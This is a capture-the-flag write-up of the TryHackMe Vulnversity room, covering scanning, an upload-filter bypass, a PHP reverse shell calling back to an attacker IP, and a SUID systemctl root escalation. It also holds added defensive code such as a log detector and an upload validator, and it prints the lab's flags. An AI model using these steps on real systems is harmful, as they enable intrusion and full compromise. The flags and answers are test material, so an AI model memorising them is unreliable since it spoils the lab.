TryHackMe: Vulnversity Write-up By Md Mirajul Haque Miraj || MirajulHaque || Security Path
Md Mirajul Haque Miraj
Cybersecurity Consultant || Pentester || CEH Practical, CNSP, CAP, CyberOps Associate || Python, C/C++
Note: This write-up is written for educational purposes only. All credit goes to TryHackMe for making this room. Please try the room yourself before reading this write-up. Thanks. Let's get STARTED…
Task 1: Deploy the machine
No answer needed.
Task 2: Reconnaissance
Let's gather information about the target following the instructions, using nmap:
nmap -sV 10.10.194.205
We found 6 open ports, including SSH. Let's jump to the questions.
Scan the box; how many ports are open?
Answer: 6
What version of the squid proxy is running on the machine?
Answer: 3.5.12
How many ports will Nmap scan if the flag -p-400 was used?
If we use -p-400 like below:
nmap -sV -p-400 10.10.194.205
then nmap will scan only the first 400 ports (a range with no lower bound starts at port 1, so -400 means 1-400). Here is the result of running this command.
Answer: 400
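To make the -p-400 answer concrete, here is a small parser for nmap's port-specification syntax. It is an added example, not code from the write-up or from the Nmap project, and it only handles numeric TCP port lists and ranges (no T:/U: prefixes or service names); the counting rules it implements are the ones nmap documents for -p.

```python
# Added example: count the ports an nmap "-p <spec>" argument covers.
# Rules implemented (numeric specs only):
#   "N"    -> the single port N
#   "A-B"  -> A to B inclusive
#   "-B"   -> 1 to B (omitted lower bound defaults to 1)
#   "A-"   -> A to 65535 (omitted upper bound defaults to 65535)
#   "-"    -> 1 to 65535
#   comma-separated lists of the above; overlapping ranges are counted once

MAX_PORT = 65535


def parse_port_spec(spec: str) -> set[int]:
    """Return the set of port numbers covered by an nmap -p specification."""
    ports: set[int] = set()
    for item in spec.split(","):
        item = item.strip()
        if not item:
            continue
        if "-" in item:
            lo_s, hi_s = item.split("-", 1)
            lo = int(lo_s) if lo_s else 1          # "-400" starts at 1
            hi = int(hi_s) if hi_s else MAX_PORT   # "1024-" runs to 65535
        else:
            lo = hi = int(item)
        # Port 0 is only reachable when written explicitly ("0-"), as in nmap.
        if not (0 <= lo <= hi <= MAX_PORT):
            raise ValueError(f"bad port range: {item!r}")
        ports.update(range(lo, hi + 1))
    return ports


def count_ports(spec: str) -> int:
    """Number of distinct ports nmap would scan for this -p specification."""
    return len(parse_port_spec(spec))


if __name__ == "__main__":
    for spec in ("-400", "-", "22,80,1-100", "65000-"):
        print(f"-p{spec:<12} scans {count_ports(spec)} ports")
```

Running it shows why the answer is 400: "-400" expands to 1-400, whereas "-" alone expands to all 65535 ports.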
What is the most likely operating system this machine is running?
Answer: Ubuntu
What port is the web server running on?
Apache is the web server, and the open service is HTTP.
Answer: 3333
What is the flag for enabling verbose mode using Nmap?
Answer: -v
Task 3: Locating Directories using Gobuster
We found HTTP on port 3333, so to enumerate directories use the command below:
gobuster dir -u http://10.10.194.205:3333 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt
Yeah, we got something. Let's jump to the question.
What is the directory that has an upload form page?
We need to visit every directory to identify the upload form page, so let's do it one by one.
Here we go, found this one.
Answer: /internal/
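From the defender's side, a directory brute-force like the one above is loud in the web server's access log: one client produces a burst of 404 responses. The following is an added example, not part of the write-up or the Vulnversity room, that parses Apache combined-format log lines and flags clients that exceed a 404 threshold; the log lines, IP addresses and the threshold are constructed for illustration.

```python
import re
from collections import Counter

# Added example: spot directory brute-forcing in Apache combined-format logs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Substrings of User-Agent headers that common enumeration tools send by default.
# A secondary signal only: any client can change its User-Agent.
TOOL_UA_MARKERS = ("gobuster", "dirbuster", "dirb", "nikto", "sqlmap")


def parse_line(line: str):
    """Return a dict of fields for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def flag_dir_bruteforce(lines, threshold: int = 5) -> dict:
    """Return {client_ip: number_of_404s} for clients at or above the threshold."""
    counts: Counter = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == "404":
            counts[rec["ip"]] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


def tool_user_agents(lines) -> set:
    """Return the set of client IPs whose User-Agent names a known enumeration tool."""
    hits = set()
    for line in lines:
        rec = parse_line(line)
        if rec and any(marker in rec["ua"].lower() for marker in TOOL_UA_MARKERS):
            hits.add(rec["ip"])
    return hits


# Constructed sample log: one client walking a wordlist, one ordinary visitor.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "GET /admin HTTP/1.1" 404 209 "-" "gobuster/3.6"',
    '198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "GET /backup HTTP/1.1" 404 209 "-" "gobuster/3.6"',
    '198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "GET /css HTTP/1.1" 301 312 "-" "gobuster/3.6"',
    '198.51.100.7 - - [10/Oct/2023:13:55:37 +0000] "GET /config HTTP/1.1" 404 209 "-" "gobuster/3.6"',
    '198.51.100.7 - - [10/Oct/2023:13:55:37 +0000] "GET /data HTTP/1.1" 404 209 "-" "gobuster/3.6"',
    '198.51.100.7 - - [10/Oct/2023:13:55:37 +0000] "GET /internal HTTP/1.1" 301 317 "-" "gobuster/3.6"',
    '198.51.100.7 - - [10/Oct/2023:13:55:38 +0000] "GET /old HTTP/1.1" 404 209 "-" "gobuster/3.6"',
    '198.51.100.7 - - [10/Oct/2023:13:55:38 +0000] "GET /test HTTP/1.1" 404 209 "-" "gobuster/3.6"',
    '203.0.113.5 - - [10/Oct/2023:13:56:01 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:56:05 +0000] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print("404 bursts:", flag_dir_bruteforce(SAMPLE_LOG))
    print("tool user agents:", tool_user_agents(SAMPLE_LOG))
```

The 404 count is the signal worth alerting on; the User-Agent match only corroborates it, since a single stray 404 (the favicon request here) is normal browsing.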
Task 4: Compromise the Webserver
We usually upload .php files to exploit, right?
What common file type you'd want to upload to exploit the server is blocked? Try a couple to find out.
Answer: .php
But after trying we found that this is not allowed here, so let's check for more using a tool named Burp Suite.
Before intercepting, I am going to make a wordlist following the instructions, using a tool named vim:
~$ vi phpextensions.txt
A new window should open; press the 'Insert' key and start typing the extensions mentioned in the task content.
Then press the 'Esc' key, then type a colon (:) followed by wq (w for write and q for quit).
Now open Burp Suite and intercept the upload request.
Send it to Intruder, set the attack type to Sniper, then add a payload position on the file extension (for our purpose it is '.jpg').
Select the 'Payloads' option, load the file we created named phpextensions.txt, then click the 'Start attack' button.
Note: Don't forget to uncheck the 'URL-encode these characters' option before starting the attack.
Result:
We found that .phtml produced a response of a different length, so that extension should be allowed.
Run this attack, what extension is allowed?
Answer: .phtml
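The behaviour observed above (.php rejected, .phtml accepted) is what a denylist of "known bad" extensions produces when the web server also hands other extensions to the PHP interpreter. As an added example, not code from the write-up or the room, here is that weak check next to a hardened one: an allowlist, exactly one extension, a magic-byte check on the content, and a server-chosen storage name. The extension lists, magic bytes and filenames are constructed for illustration.

```python
import re
import secrets

# Added example: weak denylist upload check versus a hardened allowlist check.

# Weak: reject a fixed list of extensions. Any alias the server also executes
# (.phtml in the room) passes straight through.
DENYLIST = {".php"}


def weak_is_allowed(filename: str) -> bool:
    dot = filename.rfind(".")
    ext = filename[dot:].lower() if dot != -1 else ""
    return ext not in DENYLIST


# Hardened: allow only specific extensions, and require the file content to
# start with the magic bytes of the type that extension claims.
ALLOWLIST = {
    ".jpg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
}
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def strong_is_allowed(filename: str, content: bytes) -> bool:
    # Reject path components outright rather than trying to normalise them.
    if "/" in filename or "\\" in filename:
        return False
    parts = filename.split(".")
    # Exactly one extension: "shell.php.jpg" style names are refused, which
    # matters on servers that treat every dotted suffix as an extension.
    if len(parts) != 2 or not SAFE_STEM.match(parts[0]):
        return False
    magic = ALLOWLIST.get("." + parts[1].lower())
    if magic is None:
        return False
    return content.startswith(magic)


def stored_name(ext: str) -> str:
    """Server-chosen name for the stored file; the client's name is never reused."""
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    jpeg_header = b"\xff\xd8\xff\xe0" + b"\x00" * 12   # constructed JPEG prefix
    print("weak  shell.phtml ->", weak_is_allowed("shell.phtml"))
    print("strong shell.phtml ->", strong_is_allowed("shell.phtml", b"<?php"))
    print("strong photo.jpg   ->", strong_is_allowed("photo.jpg", jpeg_header))
    print("stored as", stored_name(".jpg"))
```

Storing the file under a server-chosen name, outside the document root or in a directory where script execution is disabled, is the part that makes the extension check a second line of defence rather than the only one.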
It's time to download the reverse shell from the link given in the task content and change the extension from .php to .phtml (because only .phtml is allowed).
Open another tab in the terminal, type ifconfig and hit enter to find your own IP address.
Open the shell file with any text editor, like vim, and change the IP '127.0.0.1' to '10.4.42.77'.
Upload it.
Successfully uploaded.
Now start a netcat listener with the command below:
~$ nc -lvnp 1234
Visit the link to the uploaded file in the browser.
Now check the terminal where you ran the nc -lvnp 1234 command.
What is the name of the user who manages the webserver?
We got a shell, let's find out the user.
Run the command below to read the user list:
~$ cat /etc/passwd
Note: You may also check the home directory before reading /etc/passwd.
Answer: bill
What is the user flag?
See the hints.
Let's go and check the /home/bill directory.
Answer: 8bd7992fbe8a6ad22a63361004cfcedb
Task 5: Privilege Escalation
On the system, search for all SUID files. Which file stands out?
See the hint, then run the command below:
~$ find / -user root -perm -4000 -exec ls -ldb {} \;
Explanation: -user root selects files owned by root, -perm -4000 selects files with the set-user-ID bit set, and -exec ls -ldb {} \; prints each match in long format.
We found a list of SUID files.
Now go to https://gtfobins.github.io/ and check each one to find out which binary is listed under the SUID function.
- su = sudo
- mount = sudo
- systemctl = SUID
So the answer should be:
Answer: /bin/systemctl
Now the important part: what is SUID, and why is it useful for accessing higher-privileged files?
SUID means Set User ID. When a file has the SUID permission, it allows any user to execute the file with the permissions of the file owner. For example, if a file owned by the root user has the SUID bit set, any user executing that file will temporarily gain the root user's permissions.
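The same property that makes SUID useful to an attacker makes it easy to audit: the set of root-owned SUID files on a healthy system is small and stable. The following is an added example, not from the write-up or the room, that applies the filter of the find command above (owner root, set-user-ID bit) to file metadata and reports anything not on a known-good baseline. The baseline and the sample entries are constructed; a real baseline is recorded from a freshly built, trusted host.

```python
import os
import stat

# Added example: audit root-owned SUID files against a known-good baseline.

# Constructed baseline: SUID binaries a stock install is expected to ship.
BASELINE = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/newgrp",
    "/bin/su", "/bin/mount", "/bin/umount",
}


def is_root_suid(mode: int, uid: int) -> bool:
    """True for a regular file with the set-user-ID bit whose owner is root (uid 0).
    This is the same filter as: find / -user root -perm -4000"""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID) and uid == 0


def unexpected_suid(entries, baseline=BASELINE):
    """entries: iterable of (path, st_mode, st_uid).
    Returns the sorted root-SUID paths that are not on the baseline."""
    return sorted(
        path for path, mode, uid in entries
        if is_root_suid(mode, uid) and path not in baseline
    )


def walk_files(root="/"):
    """Live collection: yield (path, st_mode, st_uid) for every entry under root.
    lstat is used so symlinks are reported as links and skipped by is_root_suid."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            yield path, st.st_mode, st.st_uid


# Constructed sample, shaped like the Task 5 findings: a SUID systemctl is not
# something a stock install ships, so it is exactly what the audit should surface.
SUID_EXEC = stat.S_IFREG | stat.S_ISUID | 0o755
SAMPLE = [
    ("/usr/bin/passwd", SUID_EXEC, 0),
    ("/bin/mount", SUID_EXEC, 0),
    ("/bin/systemctl", SUID_EXEC, 0),
    ("/bin/ls", stat.S_IFREG | 0o755, 0),          # executable, no SUID bit
    ("/home/bill/tool", SUID_EXEC, 1000),           # SUID but not root-owned
]

if __name__ == "__main__":
    print("unexpected root SUID files (sample):", unexpected_suid(SAMPLE))
    # To audit the running host instead:
    #   print(unexpected_suid(walk_files("/")))
```

Run periodically, this also catches a setuid shell left behind after an escalation, which is the kind of change a baseline comparison exists to notice.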
Become root and get the last flag (/root/root.txt)
Visit the systemctl page we found on the GTFOBins website.
See the marked code carefully.
Now we need to change it a bit to fit our question; after the changes the code should look like below:
TF2=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF2
/bin/systemctl link $TF2
/bin/systemctl enable --now $TF2
/bin/bash -p
Then go to the /bin/ directory and paste the above code:
~$ cd /bin/
Then use these commands one by one:
~$ cd /root/
~$ ls
~$ cat root.txt
Answer: a58ff8579f0a9270368d33a9966c7fd5
~Thanks For Reading~
~Have a Good Day~
|| Web Penetration Tester || Bug-Hunter || Web Security Researcher ||
(3 months ago) well done brother